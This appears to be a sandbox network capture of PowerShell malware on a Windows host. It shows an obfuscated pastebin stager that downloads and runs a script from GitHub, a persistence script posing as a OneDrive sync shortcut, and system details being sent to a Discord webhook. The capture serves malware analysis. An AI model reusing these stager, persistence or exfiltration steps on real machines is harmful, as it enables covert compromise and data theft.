                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.949918172.67.19.244431172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:27 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:28 UTC397INHTTP/1.1 200 OK
                                                                            Date: Tue, 15 Oct 2024 16:09:28 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1;mode=block
                                                                            cache-control: public, max-age=1801
                                                                            CF-Cache-Status: HIT
                                                                            Age: 687
                                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d3112de68326bae-DFW
                                                                            2024-10-15 16:09:28 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                            2024-10-15 16:09:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.949926162.159.137.2324437632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:29 UTC333OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Content-Type: application/json
                                                                            Host: discord.com
                                                                            Content-Length: 212
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:29 UTC25INHTTP/1.1 100 Continue
                                                                            2024-10-15 16:09:29 UTC212OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 74 69 6e 61 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 67 74 61 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 42 42 44 39 50 52 4d 54 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                            Data Ascii: { "content": "**user** has joined - gta\n----------------------------------\n**GPU:** BBD9PRMT\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                            2024-10-15 16:09:29 UTC1310INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 15 Oct 2024 16:09:29 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 45
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                            x-ratelimit-limit: 5
                                                                            x-ratelimit-remaining: 4
                                                                            x-ratelimit-reset: 1729008570
                                                                            x-ratelimit-reset-after: 1
                                                                            via: 1.1 google
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPU45jbVqRzXWc0%2FFq%2B7AJ88FW84qjEFx%2B%2F%2FUF7FPYvkcr7aHwO7CmIIbqFEEHgpxVPdQHefdloIUf65dz2TjSLht1hphsOfqR%2FlgEj9LY63tyx%2Fo5iC26xsk%2Fxf"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            X-Content-Type-Options: nosniff
                                                                            Set-Cookie: __cfruid=65fa831c604bb30fa32a4e69b952d43ada3212e3-1729008569; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                            Set-Cookie: _cfuvid=c2J6VaxxOcGhDuXpF3_leOIkP.luEMUHEOWHebvmk_k-1729008569422-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d3112e5b8276b1d-DFW
                                                                            {"message": "Unknown Webhook", "code": 10015}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.949927185.199.110.1334431172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:29 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: raw.githubusercontent.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:29 UTC900INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 7508
                                                                            Cache-Control: max-age=300
                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: deny
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                            Accept-Ranges: bytes
                                                                            Date: Tue, 15 Oct 2024 16:09:29 GMT
                                                                            Via: 1.1 varnish
                                                                            X-Served-By: cache-dfw-kdfw8210034-DFW
                                                                            X-Cache: HIT
                                                                            X-Cache-Hits: 1
                                                                            X-Timer: S1729008570.606943,VS0,VE1
                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            X-Fastly-Request-ID: beec4617f6faed4390947d83a2a49b4dd589a945
                                                                            Expires: Tue, 15 Oct 2024 16:14:29 GMT
                                                                            Source-Age: 269
                                                                            2024-10-15 16:09:29 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                            2024-10-15 16:09:29 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                            2024-10-15 16:09:29 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                            2024-10-15 16:09:29 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                            2024-10-15 16:09:29 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                            2024-10-15 16:09:29 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.949964172.67.19.244431796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:36 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:36 UTC397INHTTP/1.1 200 OK
                                                                            Date: Tue, 15 Oct 2024 16:09:36 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1;mode=block
                                                                            cache-control: public, max-age=1801
                                                                            CF-Cache-Status: HIT
                                                                            Age: 695
                                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d3113130ebbe817-DFW
                                                                            2024-10-15 16:09:36 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                            2024-10-15 16:09:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.949976185.199.110.1334431796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:37 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: raw.githubusercontent.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:37 UTC900INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 7508
                                                                            Cache-Control: max-age=300
                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: deny
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                            Accept-Ranges: bytes
                                                                            Date: Tue, 15 Oct 2024 16:09:37 GMT
                                                                            Via: 1.1 varnish
                                                                            X-Served-By: cache-dfw-kdal2120099-DFW
                                                                            X-Cache: HIT
                                                                            X-Cache-Hits: 1
                                                                            X-Timer: S1729008578.910652,VS0,VE1
                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            X-Fastly-Request-ID: 0903ac6893e28f3bd2dc8f2481c165be9cc9b972
                                                                            Expires: Tue, 15 Oct 2024 16:14:37 GMT
                                                                            Source-Age: 277
                                                                            2024-10-15 16:09:37 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                            2024-10-15 16:09:37 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                            2024-10-15 16:09:37 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                            2024-10-15 16:09:37 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                            2024-10-15 16:09:37 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
